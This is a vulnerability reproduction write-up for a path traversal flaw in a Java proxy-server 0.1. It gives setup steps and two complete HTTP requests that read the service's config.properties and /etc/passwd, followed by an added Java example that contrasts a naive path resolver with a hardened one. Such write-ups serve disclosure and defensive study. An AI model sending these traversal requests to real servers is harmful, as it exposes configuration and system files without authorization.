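Statement
Study hard and make progress every day
Vulnerability description
Affected scope
Reproduction steps
Version 0.1 is used here.
Download link below. To reproduce, only the server-side package, proxy-server-0.1.zip, is needed; place it on a Linux server that already has a Java environment configured.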
https://file.nioee.com/d/2e81550ebdbd416c933f/
Run
unzip proxy-server-0.1.zip
mv proxy-server-0.1 /usr/local/
vim /usr/local/proxy-server-0.1/conf/config.properties
This shows the configuration file; leave it unchanged.
Start the service
cd /usr/local/proxy-server-0.1/bin
chmod +x startup.sh
./startup.sh
Once the environment is up, visit
http://192.168.31.64:8090/
Capture the request with BP (Burp Suite) and modify it as follows; the response shows the configuration file from earlier.
GET /../conf/config.properties HTTP/1.1
Host: 192.168.31.64:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
View passwd. If the second request hangs for a long time without returning, capture a fresh request and modify it.
GET /../../../../../../etc/passwd HTTP/1.1
Host: 192.168.31.64:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
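
Both requests above work because the server maps the request path to a file without checking that the result stays inside its web root. The following is an added example, not code from this page or from the proxy-server project, showing that unchecked mapping next to a hardened one in Java; the class, method and directory names are hypothetical and the directory layout is constructed in a temp directory.

```java
import java.io.IOException;
import java.net.URLDecoder;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
// Added illustration: class, method and directory names are hypothetical.
public class SafeStaticResolver {
    // Naive mapping: the request path is joined to the web root unchecked, so
    // "/../conf/config.properties" lands outside the web root.
    static Path naiveResolve(Path webRoot, String requestPath) {
        return Paths.get(webRoot.toString(), requestPath).normalize();
    }
    // Hardened mapping: decode once, normalize, then require containment.
    static Path safeResolve(Path webRoot, String requestPath) throws IOException {
        String decoded = URLDecoder.decode(requestPath, "UTF-8");
        if (decoded.indexOf('\0') >= 0) {
            throw new SecurityException("NUL byte in path");
        }
        Path root = webRoot.toRealPath();
        Path candidate = root.resolve(decoded.replaceFirst("^/+", "")).normalize();
        if (!candidate.startsWith(root)) {
            throw new SecurityException("path escapes web root: " + requestPath);
        }
        // An existing file may be a symlink; re-check where it really points.
        if (Files.exists(candidate) && !candidate.toRealPath().startsWith(root)) {
            throw new SecurityException("symlink escapes web root: " + requestPath);
        }
        return candidate;
    }
    public static void main(String[] args) throws IOException {
        // Constructed directory layout in a temp dir, so this runs offline.
        Path base = Files.createTempDirectory("traversal-demo");
        Path webRoot = Files.createDirectories(base.resolve("webroot"));
        Files.createDirectories(base.resolve("conf"));
        Files.write(base.resolve("conf/config.properties"), "k=v\n".getBytes());
        Files.write(webRoot.resolve("index.html"), "<html></html>".getBytes());
        // A benign path plus the two request paths shown on this page.
        String[] requests = {"/index.html", "/../conf/config.properties",
                             "/../../../../../../etc/passwd"};
        for (String r : requests) {
            System.out.println("naive " + r + " -> " + naiveResolve(webRoot, r));
            try {
                System.out.println("safe  " + r + " -> " + safeResolve(webRoot, r));
            } catch (SecurityException e) {
                System.out.println("safe  DENY: " + e.getMessage());
            }
        }
    }
}
```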